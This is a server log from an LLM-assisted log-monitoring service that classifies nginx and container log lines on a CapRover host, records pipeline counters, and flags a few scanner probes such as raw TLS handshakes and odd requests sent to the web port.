Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.607001 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T10:29:36.881547062Z 66.132.172.142 - - [20/Mar/2026:10:29:36 +0000] "_" "PRI * HTTP/2.0" 400 150 "-" "-" "-"
Mar 20 10:29:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:29:44.607042 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T10:29:39.962393883Z 66.132.172.142 - - [20/Mar/2026:10:29:39 +0000] "_" "\x16\x03\x01\x01\x10\x01\x00\x01\x0C\x03\x03`mx\x17\xC3\x83\xA1\x95\xB8\xBC;I\xA8\xB3\xE9\xB4X\xD8R\xF0\xAE6\xE3\xE3...
Mar 20 10:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:01.979570 [observer] Pipeline: processed=4233 pattern_hits=4150 llm_calls=83 llm_errors=1 learned=0
Mar 20 10:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:01.979610 [observer] Patterns: hash=4150 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83
Mar 20 10:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:31.950532 [observer] Pipeline: processed=4235 pattern_hits=4152 llm_calls=83 llm_errors=1 learned=0
Mar 20 10:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:30:31.950560 [observer] Patterns: hash=4152 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83
Mar 20 10:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:01.949294 [observer] Pipeline: processed=4239 pattern_hits=4156 llm_calls=83 llm_errors=1 learned=0
Mar 20 10:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:01.949328 [observer] Patterns: hash=4156 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83
Mar 20 10:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:31.945624 [observer] Pipeline: processed=4241 pattern_hits=4158 llm_calls=83 llm_errors=1 learned=0
Mar 20 10:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:31:31.945647 [observer] Patterns: hash=4158 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83
Mar 20 10:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:01.975772 [observer] Pipeline: processed=4245 pattern_hits=4162 llm_calls=83 llm_errors=1 learned=0
Mar 20 10:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:01.975839 [observer] Patterns: hash=4162 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=83
Mar 20 10:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:31.936305 [observer] Pipeline: processed=4250 pattern_hits=4165 llm_calls=85 llm_errors=1 learned=0
Mar 20 10:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:31.936329 [observer] Patterns: hash=4165 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=85
Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.849331 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.849376 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.940022 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 10:32:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:36.940075 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com"
Mar 20 10:32:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:40.737827 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 10:32:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:40.737868 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 10:32:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:44.488455 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 10:32:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:44.488499 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 10:32:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:47.675420 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 10:32:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:47.675459 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com"
Mar 20 10:32:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:50.125263 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 10:32:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:50.125296 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.687290 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.687333 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.897870 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 10:32:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:53.897910 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 10:32:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:57.825497 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 20 10:32:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:57.825534 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+)
Mar 20 10:32:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:58.029396 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 20 10:32:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:32:58.029438 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.791138 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.791213 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com"
Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.984969 [observer] Pipeline: processed=4263 pattern_hits=4169 llm_calls=94 llm_errors=1 learned=3
Mar 20 10:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:01.985007 [observer] Patterns: hash=4169 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94
Mar 20 10:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:31.942331 [observer] Pipeline: processed=4267 pattern_hits=4173 llm_calls=94 llm_errors=1 learned=3
Mar 20 10:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:33:31.942356 [observer] Patterns: hash=4173 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94
Mar 20 10:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:01.965116 [observer] Pipeline: processed=4269 pattern_hits=4175 llm_calls=94 llm_errors=1 learned=3
Mar 20 10:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:01.965146 [observer] Patterns: hash=4175 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94
Mar 20 10:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:31.935935 [observer] Pipeline: processed=4273 pattern_hits=4179 llm_calls=94 llm_errors=1 learned=3
Mar 20 10:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:34:31.935963 [observer] Patterns: hash=4179 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=94
Mar 20 10:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:00.228848 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 10:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:00.228890 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 10:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:02.054523 [observer] Pipeline: processed=4277 pattern_hits=4181 llm_calls=96 llm_errors=1 learned=3
Mar 20 10:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:02.054554 [observer] Patterns: hash=4181 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=96
Mar 20 10:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:04.236012 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 10:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:04.236178 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318591 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318623 [hints] Suggestion for docker:captain-netdata-container: field type "timestamp" seen in 19/20 lines, example: "2026-03-20T10:34:53.594941080Z" → "<TS>"
Mar 20 10:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:11.318638 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A warning about a missing configuration file can indicate misconfiguration or missing deployment assets. Not inherently malicious, but warrants attention. Line=2026-03-20T10:34:53.594941080Z 2026-03-20 10:34:53: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 10:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:31.936438 [observer] Pipeline: processed=4282 pattern_hits=4185 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:35:31.936463 [observer] Patterns: hash=4185 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:01.940753 [observer] Pipeline: processed=4284 pattern_hits=4187 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:01.940778 [observer] Patterns: hash=4187 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:31.934529 [observer] Pipeline: processed=4288 pattern_hits=4191 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:36:31.934572 [observer] Patterns: hash=4191 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:01.963535 [observer] Pipeline: processed=4290 pattern_hits=4193 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:01.963568 [observer] Patterns: hash=4193 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:31.950541 [observer] Pipeline: processed=4292 pattern_hits=4195 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:37:31.950569 [observer] Patterns: hash=4195 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:01.943153 [observer] Pipeline: processed=4296 pattern_hits=4199 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:01.943207 [observer] Patterns: hash=4199 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:31.939776 [observer] Pipeline: processed=4300 pattern_hits=4203 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:38:31.939802 [observer] Patterns: hash=4203 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:01.953673 [observer] Pipeline: processed=4304 pattern_hits=4207 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:01.953707 [observer] Patterns: hash=4207 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:31.934533 [observer] Pipeline: processed=4306 pattern_hits=4209 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:39:31.934554 [observer] Patterns: hash=4209 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:01.948977 [observer] Pipeline: processed=4310 pattern_hits=4213 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:01.949022 [observer] Patterns: hash=4213 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:31.943718 [observer] Pipeline: processed=4312 pattern_hits=4215 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:40:31.943748 [observer] Patterns: hash=4215 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:01.952579 [observer] Pipeline: processed=4314 pattern_hits=4217 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:01.952654 [observer] Patterns: hash=4217 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:31.942880 [observer] Pipeline: processed=4318 pattern_hits=4221 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:41:31.942908 [observer] Patterns: hash=4221 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:02.056672 [observer] Pipeline: processed=4320 pattern_hits=4223 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:02.056712 [observer] Patterns: hash=4223 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:31.938709 [observer] Pipeline: processed=4324 pattern_hits=4227 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:42:31.938737 [observer] Patterns: hash=4227 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:01.946791 [observer] Pipeline: processed=4326 pattern_hits=4229 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:01.946827 [observer] Patterns: hash=4229 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:31.934245 [observer] Pipeline: processed=4332 pattern_hits=4235 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:43:31.934277 [observer] Patterns: hash=4235 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:01.941369 [observer] Pipeline: processed=4334 pattern_hits=4237 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:01.941396 [observer] Patterns: hash=4237 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:31.950137 [observer] Pipeline: processed=4336 pattern_hits=4239 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:44:31.950185 [observer] Patterns: hash=4239 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:01.945555 [observer] Pipeline: processed=4340 pattern_hits=4243 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:01.945585 [observer] Patterns: hash=4243 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:31.945764 [observer] Pipeline: processed=4342 pattern_hits=4245 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:45:31.945795 [observer] Patterns: hash=4245 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:01.943606 [observer] Pipeline: processed=4346 pattern_hits=4249 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:01.944051 [observer] Patterns: hash=4249 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:31.935432 [observer] Pipeline: processed=4348 pattern_hits=4251 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:46:31.935461 [observer] Patterns: hash=4251 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:01.939841 [observer] Pipeline: processed=4352 pattern_hits=4255 llm_calls=97 llm_errors=1 learned=3
Mar 20 10:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:01.939881 [observer] Patterns: hash=4255 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97
Mar 20 10:47:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:17.069395 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 10:47:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:17.069439 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 10:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:31.943605 [observer] Pipeline: processed=4355 pattern_hits=4257 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:31.943635 [observer] Patterns: hash=4257 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:01.952327 [observer] Pipeline: processed=4357 pattern_hits=4259 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:01.952351 [observer] Patterns: hash=4259 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:31.934123 [observer] Pipeline: processed=4361 pattern_hits=4263 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:31.934147 [observer] Patterns: hash=4263 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:01.951419 [observer] Pipeline: processed=4365 pattern_hits=4267 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:01.951455 [observer] Patterns: hash=4267 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:31.938415 [observer] Pipeline: processed=4369 pattern_hits=4271 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:31.938452 [observer] Patterns: hash=4271 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:01.950502 [observer] Pipeline: processed=4371 pattern_hits=4273 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:01.950542 [observer] Patterns: hash=4273 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98
Mar 20 10:50:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:10.795487 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T10:50:10.795212701Z 43.165.189.206 - - [20/Mar/2026:10:50:10 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.1...
Mar 20 10:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:31.935385 [observer] Pipeline: processed=4376 pattern_hits=4278 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:31.935413 [observer] Patterns: hash=4278 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:01.948131 [observer] Pipeline: processed=4378 pattern_hits=4280 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:01.948168 [observer] Patterns: hash=4280 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:31.940025 [observer] Pipeline: processed=4380 pattern_hits=4282 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:31.940060 [observer] Patterns: hash=4282 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:01.961643 [observer] Pipeline: processed=4384 pattern_hits=4286 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:01.961676 [observer] Patterns: hash=4286 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:31.935289 [observer] Pipeline: processed=4386 pattern_hits=4288 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:31.935314 [observer] Patterns: hash=4288 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:01.952221 [observer] Pipeline: processed=4390 pattern_hits=4292 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:01.952249 [observer] Patterns: hash=4292 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:31.944961 [observer] Pipeline: processed=4392 pattern_hits=4294 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:31.944990 [observer] Patterns: hash=4294 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:01.938653 [observer] Pipeline: processed=4398 pattern_hits=4300 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:01.938682 [observer] Patterns: hash=4300 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:31.941589 [observer] Pipeline: processed=4400 pattern_hits=4302 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:31.941623 [observer] Patterns: hash=4302 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:01.957488 [observer] Pipeline: processed=4402 pattern_hits=4304 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:01.958228 [observer] Patterns: hash=4304 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:31.938339 [observer] Pipeline: processed=4406 pattern_hits=4308 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:31.938389 [observer] Patterns: hash=4308 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:01.949474 [observer] Pipeline: processed=4408 pattern_hits=4310 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:01.949503 [observer] Patterns: hash=4310 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:31.934223 [observer] Pipeline: processed=4412 pattern_hits=4314 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:31.934247 [observer] Patterns: hash=4314 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:01.952715 [observer] Pipeline: processed=4414 pattern_hits=4316 llm_calls=98 llm_errors=1 learned=3
